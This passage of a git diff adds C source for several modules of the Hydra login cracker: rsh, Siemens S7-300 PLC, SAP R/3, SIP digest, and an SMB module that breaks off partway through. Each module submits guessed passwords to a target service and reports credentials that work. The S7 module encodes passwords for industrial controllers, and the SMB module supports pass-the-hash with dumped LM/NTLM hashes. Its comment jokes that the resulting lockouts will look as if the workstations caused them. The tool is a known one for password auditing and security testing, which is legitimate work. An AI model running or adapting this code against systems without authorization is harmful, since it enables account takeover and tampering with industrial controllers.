(int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_rsh(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_rsh_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-s7-300.c b/hydra-s7-300.c new file mode 100644 index 0000000..734a7d3 --- /dev/null +++ b/hydra-s7-300.c @@ -0,0 +1,303 @@ +// submitted by Alexander Timorin and Sergey Gordeychik + +#include "hydra-mod.h" + +#define S7PASSLEN 8 + +extern char *HYDRA_EXIT; + +unsigned char p_cotp[] = + "\x03\x00\x00\x16\x11\xe0\x00\x00\x00\x17" + "\x00\xc1\x02\x01\x00\xc2\x02\x01\x02\xc0" + "\x01\x0a"; + +unsigned char p_s7_negotiate_pdu[] = + "\x03\x00\x00\x19\x02\xf0\x80\x32\x01\x00" + "\x00\x02\x00\x00\x08\x00\x00\xf0\x00\x00" + "\x01\x00\x01\x01\xe0"; + +unsigned char p_s7_read_szl[] = + "\x03\x00\x00\x21\x02\xf0\x80\x32\x07\x00" + "\x00\x03\x00\x00\x08\x00\x08\x00\x01\x12" + "\x04\x11\x44\x01\x00\xff\x09\x00\x04\x01" + "\x32\x00\x04"; + +unsigned char p_s7_password_request[] = + "\x03\x00\x00\x25\x02\xf0\x80\x32\x07\x00" + "\x00\x00\x00\x00\x08\x00\x0c\x00\x01\x12" + "\x04\x11\x45\x01\x00\xff\x09\x00\x08"; + + +int start_s7_300(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *pass, buffer[1024]; + char context[S7PASSLEN + 1]; + unsigned char encoded_password[S7PASSLEN]; + char *spaces = " "; + int ret = -1; + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + // prepare password + memset(context, 0, sizeof(context)); + if (strlen(pass) < S7PASSLEN) { + strncpy(context, pass, strlen(pass)); + strncat(context, spaces, S7PASSLEN - strlen(pass) ); + } else { + strncpy(context, pass, S7PASSLEN); + } + + // encode password + encoded_password[0] = context[0] ^ 0x55; + encoded_password[1] = context[1] ^ 0x55; + int i; + for (i = 2; i < S7PASSLEN; i++) { + encoded_password[i] = context[i] ^ encoded_password[i-2] ^ 0x55 ; + } + + // send p_cotp and check first 2 bytes of answer + if (hydra_send(s, (char *) p_cotp, 22, 0) < 0) + return 1; + memset(buffer, 0, sizeof(buffer)); + ret=hydra_recv_nb(s, buffer, sizeof(buffer)); + + if (ret <= 0) + return 3; + + if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) ) + return 3; + + // send p_s7_negotiate_pdu and check first 2 bytes of answer + if (hydra_send(s, (char *) p_s7_negotiate_pdu, 25, 0) < 0) + return 1; + memset(buffer, 0, sizeof(buffer)); + ret=hydra_recv_nb(s, buffer, sizeof(buffer)); + + if (ret <= 0) + return 3; + + if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) ) + return 3; + + // send p_s7_read_szl and check first 2 bytes of answer + if (hydra_send(s, (char *) p_s7_read_szl, 33, 0) < 0) + return 1; + memset(buffer, 0, sizeof(buffer)); + ret=hydra_recv_nb(s, buffer, sizeof(buffer)); + + if (ret <= 0) + return 3; + + if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) ) + return 3; + + // so now add encoded_password to p_s7_password_request and send + memset(buffer, 0, sizeof(buffer)); + memcpy(buffer, p_s7_password_request, 29); + memcpy(buffer + 29, encoded_password, S7PASSLEN); + + if (hydra_send(s, buffer, 29 + S7PASSLEN , 0) < 0) + return 1; + + memset(buffer, 0, sizeof(buffer)); + ret=hydra_recv_nb(s, buffer, sizeof(buffer)); + + if (ret <= 0) + return 3; + + // now check answer + // 0x0000 - valid password + // 0xd605 - no password + // 0xd602 - wrong password + if (ret > 30 ) { + if (buffer[27] == '\x00' && buffer[28] == '\x00') { + hydra_report_found_host(port, ip, "s7-300", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + } + + if (buffer[27] == '\xd6' && buffer[28] == '\x05') { + //hydra_report_found_host(port, ip, "s7-300", fp); + hydra_completed_pair_found(); + hydra_report(stderr, "[INFO] No password protection enabled\n"); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + } + } + + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + + return 1; +} + +void service_s7_300(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int s7port = PORT_S7_300; + + if (port != 0) + s7port = port; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + sock = hydra_connect_tcp(ip, s7port); + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = start_s7_300(sock, ip, s7port, options, miscptr, fp); + sock = hydra_disconnect(sock); + break; + case 2: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +int service_s7_300_init(char *ip, int sp, unsigned char options, char *miscptr, FILE *fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // 1 skip target without generating an error + // 2 skip target because of protocol problems + // 3 skip target because its unreachable + int sock = -1; + int s7port = PORT_S7_300; + char *empty = ""; + char *pass, buffer[1024]; + char context[S7PASSLEN + 1]; + unsigned char encoded_password[S7PASSLEN]; + char *spaces = " "; + int ret = -1; + int i; + + if (port != 0) + s7port = port; + + if (debug || verbose) + printf("[INFO] Checking authentication setup...\n"); + + sock = hydra_connect_tcp(ip, s7port); + if (sock < 0) { + hydra_report(stderr, "[ERROR] Can not connect to port %d on the target\n", s7port); + return 2; + } + + pass = empty; + + // prepare password + memset(context, 0, sizeof(context)); + strncat(context, spaces, S7PASSLEN - strlen(pass)); + + // encode password + encoded_password[0] = context[0] ^ 0x55; + encoded_password[1] = context[1] ^ 0x55; + for (i = 2; i < S7PASSLEN; i++) { + encoded_password[i] = context[i] ^ encoded_password[i-2] ^ 0x55 ; + } + + // send p_cotp and check first 2 bytes of answer + if (hydra_send(sock, (char *) p_cotp, 22, 0) < 0) { + fprintf(stderr, "[ERROR] can not send data to service\n"); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) { + fprintf(stderr, "[ERROR] did not received data from the service\n"); + return 3; + } + + if (ret < 2 || (buffer[0] != 0x03 && buffer[1] != 0x00)) { + fprintf(stderr, "[ERROR] invalid reply to init packet\n"); + return 3; + } + + // send p_s7_negotiate_pdu and check first 2 bytes of answer + if (hydra_send(sock, (char *) p_s7_negotiate_pdu, 25, 0) < 0) { + fprintf(stderr, "[ERROR] can not send data to service (2)\n"); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) { + fprintf(stderr, "[ERROR] did not received data from the service (2)\n"); + return 3; + } + + if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00)) { + fprintf(stderr, "[ERROR] invalid reply to init packet (2)\n"); + return 3; + } + + // send p_s7_read_szl and check first 2 bytes of answer + if (hydra_send(sock, (char *) p_s7_read_szl, 33, 0) < 0) { + fprintf(stderr, "[ERROR] can not send data to service (3)\n"); + return 3; + } + memset(buffer, 0, sizeof(buffer)); + if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) >= 0) { + fprintf(stderr, "[ERROR] did not received data from the service (3)\n"); + return 3; + } + + if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) ) { + fprintf(stderr, "[ERROR] invalid reply to init packet (3)\n"); + return 3; + } + + // so now add encoded_password to p_s7_password_request and send + memset(buffer, 0, sizeof(buffer)); + memcpy(buffer, p_s7_password_request, 29); + memcpy(buffer + 29, encoded_password, S7PASSLEN); + + if (hydra_send(sock, buffer, 29 + S7PASSLEN , 0) < 0) { + fprintf(stderr, "[ERROR] can not send data to service (4)\n"); + return 3; + } + + memset(buffer, 0, sizeof(buffer)); + if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) { + fprintf(stderr, "[ERROR] did not received data from the service (4)\n"); + return 3; + } + + // now check answer + // 0x0000 - valid password + // 0xd605 - no password + // 0xd602 - wrong password + if (ret > 30) { + if ((buffer[27] == '\x00' && buffer[28] == '\x00') || (buffer[27] == '\xd6' && buffer[28] == '\x05')) { + hydra_report(stderr, "[INFO] No password protection enabled, no password tests are necessary!\n"); + return 1; + } + } + + sock = hydra_disconnect(sock); + + return 0; +} diff --git a/hydra-sapr3.c b/hydra-sapr3.c new file mode 100644 index 0000000..8b4543b --- /dev/null +++ b/hydra-sapr3.c @@ -0,0 +1,132 @@ +#include "hydra-mod.h" +// checked for memleaks on 110425, none found +#ifndef LIBSAPR3 +void dummy_sapr3() { + printf("\n"); +} +#else + +#include +#include + +/* temporary workaround fix */ +const int *__ctype_tolower; +const int *__ctype_toupper; +const int *__ctype_b; + +extern void flood(); /* for -lm */ + +extern char *HYDRA_EXIT; +RFC_ERROR_INFO_EX error_info; + +int start_sapr3(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + RFC_HANDLE handle; + char *empty = ""; + char *login, *pass, buffer[1024]; + char *buf; + int i; + int sysnr = port % 100; + char opts[] = "RFCINI=N RFCTRACE=N BALANCE=N DEBUG=N TRACE=0 ABAP_DEBUG=0"; + +// char opts[] = "RFCINI=N RFCTRACE=Y BALANCE=N DEBUG=Y TRACE=Y ABAP_DEBUG=Y"; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + if (strlen(login) > 0) + for (i = 0; i < strlen(login); i++) + login[i] = (char) toupper(login[i]); + if (strlen(pass) > 0) + for (i = 0; i < strlen(pass); i++) + pass[i] = (char) toupper(pass[i]); + + memset(buffer, 0, sizeof(buffer)); + memset(&error_info, 0, sizeof(error_info)); + +//strcpy(buf, "mvse001"); + snprintf(buffer, sizeof(buffer), "ASHOST=%s SYSNR=%02d CLIENT=%03d USER=\"%s\" PASSWD=\"%s\" LANG=DE %s", hydra_address2string(ip), sysnr, atoi(miscptr), login, pass, opts); + +/* + USER=SAPCPIC PASSWORD=admin + USER=SAP* PASSWORD=PASS + + ## do we need these options? + SAPSYS=3 SNC_MODE=N SAPGUI=N INVISIBLE=N GUIATOPEN=Y NRCALL=00001 CLOSE=N + + ASHOST= // IP + SYSNR= // port - 3200, scale 2 + CLIENT= // miscptr, scale 2 + ABAP_DEBUG=0 + USER= + PASSWD= + LANG=DE +*/ +//printf ("DEBUG: %d Connectstring \"%s\"\n",sizeof(error_info),buffer); + handle = RfcOpenEx(buffer, &error_info); + +//printf("DEBUG: handle %d, key %s, message %s\n", handle, error_info.key, error_info.message); + + if (handle <= RFC_HANDLE_NULL) + return 3; + + if (strstr(error_info.message, "sapgui") != NULL || strlen(error_info.message) == 0) { + hydra_report_found_host(port, ip, "sapr3", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + return 1; + } else { + if (strstr(error_info.key, "ERROR_COMMUNICATION") != NULL) { + /* sysnr does not exist, report as port closed */ + return 3; + } + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 2; + } + return 1; +} + +void service_sapr3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + next_run = start_sapr3(sock, ip, port, options, miscptr, fp); + break; + case 2: + hydra_child_exit(0); + case 3: /* clean exit */ + fprintf(stderr, "[ERROR] could not connect to target port %d\n", port); + hydra_child_exit(1); + case 4: + hydra_child_exit(2); + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +#endif + +int service_sapr3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-sip.c b/hydra-sip.c new file mode 100644 index 0000000..767a2d3 --- /dev/null +++ b/hydra-sip.c @@ -0,0 +1,303 @@ + +/* simple sip digest auth (md5) module 2009/02/19 + * written by gh0st 2005 + * modified by Jean-Baptiste Aviat - should + * work now, but only with -T 1 + * + * 05042011 david: modified to use sasl lib + */ +#ifndef LIBOPENSSL +#include +void dummy_sip() { + printf("\n"); +} +#else + +#include "sasl.h" +#include "hydra-mod.h" + +extern int hydra_data_ready_timed(int socket, long sec, long usec); + +char external_ip_addr[17] = ""; +char *get_iface_ip(unsigned long int ip); +int cseq; +extern char *HYDRA_EXIT; + + +#define SIP_MAX_BUF 1024 + +void empty_register(char *buf, char *host, char *lhost, int port, int lport, char *user) { + memset(buf, 0, SIP_MAX_BUF); + snprintf(buf, SIP_MAX_BUF, + "REGISTER sip:%s SIP/2.0\r\n" + "Via: SIP/2.0/UDP %s:%i\r\n" + "From: \r\n" + "To: \r\n" "Call-ID: 1337@%s\r\n" "CSeq: %i REGISTER\r\n" "Content-Length: 0\r\n\r\n", host, lhost, lport, user, host, user, host, host, cseq); +} + +int get_sip_code(char *buf) { + int code; + char tmpbuf[SIP_MAX_BUF], word[SIP_MAX_BUF]; + + if (sscanf(buf, "%s %i %s", tmpbuf, &code, word) != 3) + return -1; + return code; +} + +int start_sip(int s, char *ip, char *lip, int port, int lport, unsigned char options, char *miscptr, FILE * fp) { + char *login, *pass, *host, buffer[SIP_MAX_BUF]; + int i; + char buf[SIP_MAX_BUF]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = NULL; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = NULL; + + if (external_ip_addr[0]) + lip = external_ip_addr; + + host = miscptr; + cseq = 1; + + empty_register(buffer, host, lip, port, lport, login); + cseq++; + + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 3; + } + + int has_sip_cred = 0; + int try = 0; + + /* We have to check many times because server may begin to send "100 Trying" + * before "401 Unauthorized" */ + while (try < 2 && !has_sip_cred) { + try++; + if (hydra_data_ready_timed(s, 3, 0) > 0) { + i = hydra_recv(s, (char *) buf, sizeof(buf)); + buf[sizeof(buf) - 1] = '\0'; + if (strncmp(buf, "SIP/2.0 404", 11) == 0) { + hydra_report(stdout, "[ERROR] Get error code 404 : user '%s' not found\n", login); + return 2; + } + if (strncmp(buf, "SIP/2.0 606", 11) == 0) { + char *ptr = NULL; + int i = 0; + + // if we already tried to connect, exit + if (external_ip_addr[0]) { + hydra_report(stdout, "[ERROR] Get error code 606 : session is not acceptable by the server\n"); + return 2; + } + + if (verbose) + hydra_report(stdout, "[VERBOSE] Get error code 606 : session is not acceptable by the server,\n" + "maybe it's an addressing issue as you are using NAT, trying to reconnect\n" "using addr from the server reply\n"); + /* + SIP/2.0 606 Not Acceptable + Via: SIP/2.0/UDP 192.168.0.21:46759;received=82.227.229.137 + */ +#ifdef HAVE_PCRE + if (hydra_string_match(buf, "Via: SIP.*received=")) { + ptr = strstr(buf, "received="); +#else + if ((ptr = strstr(buf, "received="))) { +#endif + strncpy(external_ip_addr, ptr + strlen("received="), sizeof(external_ip_addr)); + external_ip_addr[sizeof(external_ip_addr) - 1] = '\0'; + for (i = 0; i < strlen(external_ip_addr); i++) { + if (external_ip_addr[i] <= 32) { + external_ip_addr[i] = '\0'; + } + } + if (verbose) + hydra_report(stderr, "[VERBOSE] Will reconnect using external IP address %s\n", external_ip_addr); + return 1; + } + hydra_report(stderr, "[ERROR] Could not find external IP address in server answer\n"); + return 2; + } + } + } + if (!strstr(buf, "WWW-Authenticate: Digest")) { + hydra_report(stderr, "[ERROR] no www-authenticate header found!\n"); + return -1; + } + if (verbose) + hydra_report(stderr, "[INFO] S: %s\n", buf); + char buffer2[512]; + + sasl_digest_md5(buffer2, login, pass, strstr(buf, "WWW-Authenticate: Digest") + strlen("WWW-Authenticate: Digest") + 1, host, "sip", NULL, 0, NULL); + + memset(buffer, 0, SIP_MAX_BUF); + snprintf(buffer, SIP_MAX_BUF, + "REGISTER sip:%s SIP/2.0\n" + "Via: SIP/2.0/UDP %s:%i\n" + "From: \n" + "To: \n" + "Call-ID: 1337@%s\n" "CSeq: %i REGISTER\n" "Authorization: Digest %s\n" "Content-Length: 0\n\n", host, lip, lport, login, host, login, host, host, cseq, buffer2); + + cseq++; + if (verbose) + hydra_report(stderr, "[INFO] C: %s\n", buffer); + if (hydra_send(s, buffer, strlen(buffer), 0) < 0) { + return 3; + } + try = 0; + int has_resp = 0; + int sip_code = 0; + + while (try < 2 && !has_resp) { + try++; + if (hydra_data_ready_timed(s, 5, 0) > 0) { + memset(buf, 0, sizeof(buf)); + i = hydra_recv(s, (char *) buf, sizeof(buf)); + if (verbose) + hydra_report(stderr, "[INFO] S: %s\n", buf); + sip_code = get_sip_code(buf); + if (sip_code >= 200 && sip_code < 300) { + hydra_report_found_host(port, ip, "sip", fp); + hydra_completed_pair_found(); + has_resp = 1; + } + if (sip_code >= 400 && sip_code < 500) { + has_resp = 1; + } + } + } + + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + + return 1; +} + +void service_sip(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_SIP, mysslport = PORT_SIP_SSL; + + char *lip = get_iface_ip((int) *(&ip[1])); + + hydra_register_socket(sp); + + // FIXME IPV6 + if (ip[0] != 4) { + fprintf(stderr, "[ERROR] sip module is not ipv6 enabled yet, patches are appreciated.\n"); + hydra_child_exit(2); + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + run = 3; + + int lport = 0; + + while (1) { + switch (run) { + case 1: + if (sock < 0) { + if (port != 0) + myport = port; + lport = rand() % (65535 - 1024) + 1024; + hydra_set_srcport(lport); + + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_udp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + free(lip); + hydra_child_exit(1); + } + } + next_run = start_sip(sock, ip, lip, port, lport, options, miscptr, fp); + break; + case 2: + if (sock >= 0) + sock = hydra_disconnect(sock); + free(lip); + hydra_child_exit(2); + break; + case 3: + if (sock >= 0) + sock = hydra_disconnect(sock); + free(lip); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + free(lip); + hydra_child_exit(2); + } + run = next_run; + } +} + +char *get_iface_ip(unsigned long int ip) { + + int sfd; + + sfd = socket(AF_INET, SOCK_DGRAM, 0); + + struct sockaddr_in tparamet; + + tparamet.sin_family = AF_INET; + tparamet.sin_port = htons(2000); + tparamet.sin_addr.s_addr = ip; + + if (connect(sfd, (const struct sockaddr *) &tparamet, sizeof(struct sockaddr_in))) { + perror("connect"); + close(sfd); + return NULL; + } + struct sockaddr_in *local = malloc(sizeof(struct sockaddr_in)); + int size = sizeof(struct sockaddr_in); + + if (getsockname(sfd, (void *) local, (socklen_t *) & size)) { + perror("getsockname"); + close(sfd); + free(local); + return NULL; + } + close(sfd); + + char buff[32]; + + if (!inet_ntop(AF_INET, (void *) &local->sin_addr, buff, 32)) { + perror("inet_ntop"); + free(local); + return NULL; + } + char *str = malloc(sizeof(char) * (strlen(buff) + 1)); + + strcpy(str, buff); + free(local); + return str; +} + +#endif + +int service_sip_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-smb.c b/hydra-smb.c new file mode 100644 index 0000000..3827a32 --- /dev/null +++ b/hydra-smb.c @@ -0,0 +1,1431 @@ +#include "hydra-mod.h" +#ifndef LIBOPENSSL +void dummy_smb() { + printf("\n"); +} +#else +#include +#include +#include "hmacmd5.h" +#include "sasl.h" + +/* + +http://technet.microsoft.com/en-us/library/cc960646.aspx + + Most of the new code comes from Medusa smbnt module + + ------------------------------------------------------------------------ + Copyright (C) 2009 Joe Mondloch + JoMo-Kun / jmk@foofus.net + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License version 2, + as published by the Free Software Foundation + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + http://www.gnu.org/licenses/gpl.txt + + This program is released under the GPL with the additional exemption + that compiling, linking, and/or using OpenSSL is allowed. + + ------------------------------------------------------------------------ + + Based on code from: SMB Auditing Tool + [Copyright (C) Patrik Karlsson 2001] + This code allows Hydra to directly test NTLM hashes against + a Windows. This may be useful for an auditor who has aquired + a sam._ or pwdump file and would like to quickly determine + which are valid entries. This module can also be used to test + SMB passwords against devices that do not allow clear text + LanMan passwords. + + The "-m 'METHOD'" option is required for this module. The + following are valid methods: Local, Domain, Hash, Machine, + NTLMV2, NTLM, LMV2, LM (in quotes). + + Local == Check local account. + Domain == Check credentials against this hosts primary + domain controller via this host. + Hash == Use a NTLM hash rather than a password. + Machine == Use the Machine's NetBIOS name as the password. + NTLMV2, NTLM, LMV2, LM == set the dialect + + Be careful of mass domain account lockout with this. For + example, assume you are checking several accounts against + many domain workstations. If you are not using the 'L' + options and these accounts do not exist locally on the + workstations, each workstation will in turn check their + respective domain controller. This could cause a bunch of + lockouts. Of course, it'd look like the workstations, not + you, were doing it. ;) + + **FYI, this code is unable to test accounts on default XP + hosts which are not part of a domain and do not have normal + file sharing enabled. Default XP does not allow shares and + returns STATUS_LOGON_FAILED for both valid and invalid + credentials. XP with simple sharing enabled returns SUCCESS + for both valid and invalid credentials. If anyone knows a + way to test in these configurations... + +*/ + +#define WIN2000_NATIVEMODE 1 +#define WIN_NETBIOSMODE 2 + + +#define PLAINTEXT 10 +#define ENCRYPTED 11 + + +#ifndef CHAR_BIT +#define CHAR_BIT 8 +#endif + +#ifndef TIME_T_MIN +#define TIME_T_MIN ((time_t)0 < (time_t) -1 ? (time_t) 0 \ + : ~ (time_t) 0 << (sizeof (time_t) * CHAR_BIT - 1)) +#endif +#ifndef TIME_T_MAX +#define TIME_T_MAX (~ (time_t) 0 - TIME_T_MIN) +#endif + +#define IVAL_NC(buf,pos) (*(unsigned int *)((char *)(buf) + (pos))) /* Non const version of above. */ +#define SIVAL(buf,pos,val) IVAL_NC(buf,pos)=((unsigned int)(val)) + +#define TIME_FIXUP_CONSTANT_INT 11644473600LL + + +extern char *HYDRA_EXIT; +static unsigned char challenge[8]; +static unsigned char workgroup[16]; +static unsigned char domain[16]; +static unsigned char machine_name[16]; +int hashFlag, accntFlag, protoFlag; + +int smb_auth_mechanism = AUTH_NTLM; +int security_mode = ENCRYPTED; + +static size_t UTF8_UTF16LE(unsigned char *in, int insize, unsigned char *out, int outsize) +{ + int i=0,j=0; + unsigned long int ch; + if (debug) { + hydra_report(stderr, "[DEBUG] UTF8_UTF16LE in:\n"); + hydra_dump_asciihex(in, insize); + } + for (i = 0; i < insize; i++) { + if (in[i] < 128) { // one byte + out[j] = in[i]; + out[j+1] = 0; + j=j+2; + } else if ((in[i] >= 0xc0) && (in[i] <= 0xdf)) { // Two bytes + out[j+1] = 0x07 & (in[i] >> 2); + out[j] = (0xc0 & (in[i] << 6)) | (0x3f & in[i+1]); + j=j+2; + i=i+1; + } else if ((in[i] >= 0xe0) && (in[i] <= 0xef)) { // Three bytes + out[j] = (0xc0 & (in[i+1] << 6)) | (0x3f & in[i+2]); + out[j+1] = (0xf0 & (in[i] << 4)) | (0x0f & (in[i+1] >> 2)); + j=j+2; + i=i+2; + } else if ((in[i] >= 0xf0) && (in[i] <= 0xf7)) { // Four bytes + ch = ((in[i] & 0x07) << 18) + ((0x3f & in[i+1]) << 12) + ((0x3f & in[i+2]) << 6) + (0x3f & in[i+3])- 0x10000; + out[j] = (ch >> 10) & 0xff; + out[j+1] = 0xd8 | ((ch >> 18) & 0xff); + out[j+2] = ch & 0xff; + out[j+3] = 0xdc | ((ch >> 8) & 0x3 ); + j=j+4; + i=i+3; + } + if ( j-2 > outsize) break; + } + if (debug) { + hydra_report(stderr, "[DEBUG] UTF8_UTF16LE out:\n"); + hydra_dump_asciihex(out,j); + } + return j; +} + +static unsigned char Get7Bits(unsigned char *input, int startBit) { + register unsigned int word; + + word = (unsigned) input[startBit / 8] << 8; + word |= (unsigned) input[startBit / 8 + 1]; + + word >>= 15 - (startBit % 8 + 7); + + return word & 0xFE; +} + +/* Make the key */ +static void MakeKey(unsigned char *key, unsigned char *des_key) { + des_key[0] = Get7Bits(key, 0); + des_key[1] = Get7Bits(key, 7); + des_key[2] = Get7Bits(key, 14); + des_key[3] = Get7Bits(key, 21); + des_key[4] = Get7Bits(key, 28); + des_key[5] = Get7Bits(key, 35); + des_key[6] = Get7Bits(key, 42); + des_key[7] = Get7Bits(key, 49); + + des_set_odd_parity((des_cblock *) des_key); +} + +/* Do the DesEncryption */ +void DesEncrypt(unsigned char *clear, unsigned char *key, unsigned char *cipher) { + des_cblock des_key; + des_key_schedule key_schedule; + + MakeKey(key, des_key); + des_set_key(&des_key, key_schedule); + des_ecb_encrypt((des_cblock *) clear, (des_cblock *) cipher, key_schedule, 1); +} + +/* + HashLM + Function: Create a LM hash from the challenge + Variables: + lmhash = the hash created from this function + pass = users password + challenge = the challenge recieved from the server +*/ +int HashLM(unsigned char **lmhash, unsigned char *pass, unsigned char *challenge) { + static unsigned char magic[] = { 0x4b, 0x47, 0x53, 0x21, 0x40, 0x23, 0x24, 0x25 }; + unsigned char password[14 + 1]; + unsigned char lm_hash[21]; + unsigned char lm_response[24]; + int i = 0, j = 0; + unsigned char *p = NULL; + char HexChar; + int HexValue; + + memset(password, 0, 14 + 1); + memset(lm_hash, 0, 21); + memset(lm_response, 0, 24); + + /* Use LM Hash instead of password */ + /* D42E35E1A1E4C22BD32E2170E4857C20:5E20780DD45857A68402938C7629D3B2::: */ + if (hashFlag == 1) { + p = pass; + while ((*p != '\0') && (i < 1)) { + if (*p == ':') + i++; + p++; + } + + if (*p == '\0') { + hydra_report(stderr, "[ERROR] Reading PwDump file.\n"); + return -1; + } else if (*p == 'N') { + if (verbose) + hydra_report(stderr, "[VERBOSE] Found \"NO PASSWORD\" for LM Hash.\n"); + + /* Generate 16-byte LM hash */ + DesEncrypt(magic, &password[0], &lm_hash[0]); + DesEncrypt(magic, &password[7], &lm_hash[8]); + } else { + if (verbose) + hydra_report(stderr, "[VERBOSE] Convert ASCII PwDump LM Hash (%s).\n", p); + for (i = 0; i < 16; i++) { + HexValue = 0x0; + for (j = 0; j < 2; j++) { + HexChar = (char) p[2 * i + j]; + + if (HexChar > 0x39) + HexChar = HexChar | 0x20; /* convert upper case to lower */ + + if (!(((HexChar >= 0x30) && (HexChar <= 0x39)) || /* 0 - 9 */ + ((HexChar >= 0x61) && (HexChar <= 0x66)))) { /* a - f */ + + hydra_report(stderr, "[ERROR] Invalid char (%c) for hash.\n", HexChar); + HexChar = 0x30; + } + + HexChar -= 0x30; + if (HexChar > 0x09) /* HexChar is "a" - "f" */ + HexChar -= 0x27; + + HexValue = (HexValue << 4) | (char) HexChar; + } + lm_hash[i] = (unsigned char) HexValue; + } + } + } else { + /* Password == Machine Name */ + if (hashFlag == 2) { + for (i = 0; i < 16; i++) { + if (machine_name[i] > 0x39) + machine_name[i] = machine_name[i] | 0x20; /* convert upper case to lower */ + pass = machine_name; + } + } + + /* convert lower case characters to upper case */ + strncpy((char *) password, (char *) pass, 14); + for (i = 0; i < 14; i++) { + if ((password[i] >= 0x61) && (password[i] <= 0x7a)) /* a - z */ + password[i] -= 0x20; + } + + /* Generate 16-byte LM hash */ + DesEncrypt(magic, &password[0], &lm_hash[0]); + DesEncrypt(magic, &password[7], &lm_hash[8]); + } + + /* + NULL-pad 16-byte LM hash to 21-bytes + Split resultant value into three 7-byte thirds + DES-encrypt 